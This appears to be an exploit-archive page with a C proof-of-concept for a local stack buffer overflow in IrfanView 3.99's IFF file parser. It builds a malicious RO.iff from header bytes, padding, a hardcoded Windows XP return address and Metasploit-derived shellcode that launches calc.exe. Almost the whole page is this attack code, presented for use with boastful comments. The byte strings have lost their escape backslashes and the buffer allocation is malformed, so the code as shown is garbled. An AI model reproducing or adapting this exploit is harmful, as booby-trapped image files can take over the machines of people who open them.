IrfanView <= 3.99 IFF File Local Stack Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : IrfanView <= 3.99 IFF File Local Stack Buffer Overflow Exploit
# Published : 2008-08-01
# Author : fl0 fl0w
# Previous Title : Acoustica Mixcraft <= 4.2 Build 98 (mx4 file) Local BOF Exploit
# Next Title : CoolPlayer m3u File Local Buffer Overflow Exploit
/*Irfan View 3.99 .IFF File Local Stack Buffer Overflow 
  This sploit runs calc.exe tested on Win XP Pro sp3;If
  you run it on another vs of Win make sure you chance the 
  retaddress,but it works almost all the time so.. .
  Credits for finding the bug and sploit go to fl0 fl0w.
  Gretez to all romanian coderz  :)  ! 
  Have a blast ! ! 
*/
#include <stdio.h>
#include <stdlib.h>

#define SF "RO.iff"
#define OFFSET 2100

//shellcode from metasploit
 char shellcode[]=
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x51x5ax37x6ax63"
"x58x30x42x30x50x42x6bx42x41x73x41x42x32x42x41x32"
"x41x41x30x41x41x58x38x42x42x50x75x38x69x69x6cx38"
"x68x41x54x77x70x57x70x75x50x6ex6bx41x55x55x6cx6e"
"x6bx43x4cx66x65x41x68x45x51x58x6fx4cx4bx50x4fx62"
"x38x6ex6bx41x4fx31x30x36x61x4ax4bx41x59x6cx4bx74"
"x74x6ex6bx44x41x4ax4ex47x41x4bx70x6fx69x6cx6cx4c"
"x44x4bx70x43x44x76x67x4bx71x4ax6ax66x6dx66x61x39"
"x52x5ax4bx4ax54x75x6bx62x74x56x44x73x34x41x65x4b"
"x55x4ex6bx73x6fx54x64x53x31x6ax4bx35x36x6cx4bx64"
"x4cx30x4bx6cx4bx73x6fx57x6cx75x51x6ax4bx6cx4bx37"
"x6cx6cx4bx77x71x68x6bx4cx49x71x4cx51x34x43x34x6b"
"x73x46x51x79x50x71x74x4cx4bx67x30x36x50x4cx45x4b"
"x70x62x58x74x4cx6cx4bx53x70x56x6cx4ex6bx34x30x47"
"x6cx4ex4dx6cx4bx70x68x37x78x58x6bx53x39x6cx4bx4f"
"x70x6cx70x53x30x43x30x73x30x6cx4bx42x48x77x4cx61"
"x4fx44x71x6bx46x73x50x72x76x6bx39x5ax58x6fx73x4f"
"x30x73x4bx56x30x31x78x61x6ex6ax78x4bx52x74x33x55"
"x38x4ax38x69x6ex6cx4ax54x4ex52x77x79x6fx79x77x42"
"x43x50x61x70x6cx41x73x64x6ex51x75x52x58x31x75x57"
"x70x63";

char iff1[]=
"x46x4Fx52x4Dx00x01x0Bx7Ex49x4Cx42x4Dx42x4Dx48x44"
"x00x00x00x14x01xFDx01xB6x00x00x00x00x08x00x01x00"
"x00x00xC7xC7x01xFDx01xB6x43x4Dx41x50x00x00x0Cx00"
"x1Bx1Bx19xFFxFFxFFxBCxD7xEAxEFx64x2Ex73xA9xD2xD9"
"xD9xD9x13x6ExB6x00x68xB4x70x70x70xF0x92x6Cx2ExCC"
"xCCxFAxF2xE6x99x99x99x50x94xC5xF1xE9xE6xF7xADx32"
"xACxB4xB4x4Dx4Bx48xF0xC9xB4xABx85x38xE0xE9xEFxEC"
"xE5xDExEFxB4x98x2Ex80xBCxE5x98x3Ax8Cx8Cx8CxEFxE0"
"xD3xA6xC4xD9x33x33x33x8CxB6xD5xC6xD5xDDxFAxF7xF3"
"xFEx01x02x00x00x00x00x00x00x00x00x03xFBxEFx3Fx78"
"xE8xFFx00xF8xDFx00x03x04x10x40x41xE7x00xEBx00x00"
"xC0xF4x00x01x41x56xE7x00xDFx00x03x04x30x40xC7xE7"
"x00xEAx00x00x18xF7x00x03x03xE0x80x5ExE7x00xC1x00"
"xC1x00xC1x00xEBxFFx01x7FxE7xF7xFFx03xFCxA7x7Ex72"
"xE8xFFx00xF8xDDx00x01x01x64xE7x00xDFx00x00x01xFF"
"x00x01x60x80xE8x00xEBx00x00x80xF6x00x03x05xC8x81"
"x6ExE7x00xEBx00x01x40x10xF7x00x03x04xA0x40x72xE7"
"x00xC1x00xC1x00xC1x00xEBxFFx01x3Fx87xFFxFFx00xDD"
"xFCxFFx05xEFxF7xFFxE7x9Ex66xE8xFFx00xF8xEAx00x04"
"x60x00xA0x22x01xFEx00x07x20x50x08x00x10x01x09x80"
"xE8x00xECx00x05x01x20x69x80xE0x63xFFx03x04x01x80"
"x60x70x18xFEx00x01xA8x80xE8x00xEAx00x04x68x00xA0"
"x22x01xFEx00x07x20x50x08x04x14xA1x89x80xE8x00xEC"
"x00x05x01x00x18x80xA0x40xFFx01x09x00x80x20x40x00"
"x06x04x80xA0x80xE8x00xC1x00xC1x00xC1x00xECxFFx10"
"xFEx3Fx81x7Ex4Dx97x38x73xB9xFAx4Fx2FxD3xFFxF1x0E"
"x67xE8xFFx00xF8xEAx00x00x04xFFx02x00x08xFFx00x08"
"x40x00x01x00x02x00x0Ax01x60xE7x00xEBx00x0Fx02x4A"
"xA2xA0x48xC3x04x02x20xA1x54x2Ax00x02x20xF0xE7x00"
"xECx00x10x01xC0xCEx83xB2xC8xC7x0Cx42x00xA1xD0x6E"
"x04x0AxF1xF8xE7x00xEBx00x05x23xFBxC2xE1xE7x83xFF"
"x87x07xC7xF1x78x7Ax06x00x20xF0xE7x00xC1x00xC1x41";

 char iff2[]=
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x48";

 char iff3[]=
 "x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41";

 int main()
{
	FILE* k;
	char *buffer;
	int offset=0;
	unsigned int retaddress=0x7C8369F0;
    buffer=(char *)malloc(OFFSET+sizeof(iff2)+sizeof(iff2)+sizeof(iff3))+4+1;
    
     if((k=fopen(SF,"wb"))==NULL)
   { printf("error"); exit(0); } 

	memcpy(buffer,iff1,sizeof(iff1));
	offset=sizeof(iff1);
	memcpy(buffer+offset,iff2,sizeof(iff2)); 		
    offset+=sizeof(iff2);
	memcpy(buffer+offset,iff3,sizeof(iff3));
	offset+=sizeof(iff3);
	offset=0;
	offset=OFFSET;
	memcpy(buffer+offset,&retaddress,4);
	offset+=4;
	memcpy(buffer+offset,shellcode,sizeof(shellcode));
	fwrite( buffer, 1,sizeof(iff2)+sizeof(iff2)+sizeof(iff3)+1, k );
    printf("|--------------------------------------------------------------------------|n");
   printf("Irfan View 3.99 .IFF File Local Stack Buffer Overflow n");
   printf("Credits for finging the bug and sploit go to fl0 fl0wn");
   printf(".IFF file done.. open with Irfan View and have a blast! n" );
   printf("|--------------------------------------------------------------------------|n");
   fclose(k);
	return 0;
	
}

// www.Syue.com [2008-08-01]